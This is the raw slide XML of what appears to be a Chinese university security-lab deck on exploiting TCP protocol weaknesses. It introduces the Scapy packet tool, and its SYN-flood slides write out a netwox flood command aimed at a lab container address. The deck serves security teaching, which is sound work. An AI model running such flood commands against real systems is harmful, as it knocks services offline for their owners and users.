          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-436245"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-394970"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-387350"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第四级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" indent="-398780"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第五级</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1566863"/>
            <a:ext cx="7958138" cy="109537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="585" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="585" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1000" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>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cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Line 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="609600" y="6172200"/>
            <a:ext cx="7924800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227334" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>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7335" name="Rectangle 7"/>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2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7336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>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p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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p:titleStyle>
    <p:body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574675" y="304800"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-436245"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-394970"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-387350"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第四级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" indent="-398780"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第五级</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1566863"/>
            <a:ext cx="7958138" cy="109537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="585" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="585" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1000"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1000" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>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cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Line 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="609600" y="6172200"/>
            <a:ext cx="7924800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227334" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>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7335" name="Rectangle 7"/>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2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7336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>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transition/>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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p:titleStyle>
    <p:body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hyperlink" Target="https://wizardforcel.gitbooks.io/scapy-docs/content/" TargetMode="Externa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png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="990600"/>
            <a:ext cx="8494712" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>实验一 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>协议漏洞利用实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CD16F6-2451-48D1-AB73-88395D900BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="5445224"/>
            <a:ext cx="5688632" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>华中科技大学网络空间安全学院</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CABB52-11F2-42BC-B337-AFC91A97CED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="3573016"/>
            <a:ext cx="4824536" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>王美珍、肖凌、张云鹤、梅松</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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4BBAD0-25E8-4E8F-ABCA-7DA1CFBABFA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B26315-6C20-4F85-88D1-9D1866FEEF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>功能强大，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编写的交互式数据包处理程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能让用户发送、嗅探、解析，以及伪造网络报文，可用来侦测、扫描和向网络发动攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>主要做两件事：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>发送报文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>接收回应</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0" err="1">
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="0" dirty="0">
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>安装：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="0" dirty="0">
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>t-get install python-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0" err="1">
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348726047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TCP SYN-Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="378460" y="1777365"/>
            <a:ext cx="8189595" cy="4316095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>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5C8198-8567-42B7-8CFD-03944722FA38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6882494B-B8E2-4E09-B6FE-4BFAA98C8563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 76 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 172.17.0.3 -p 23 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="471170" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
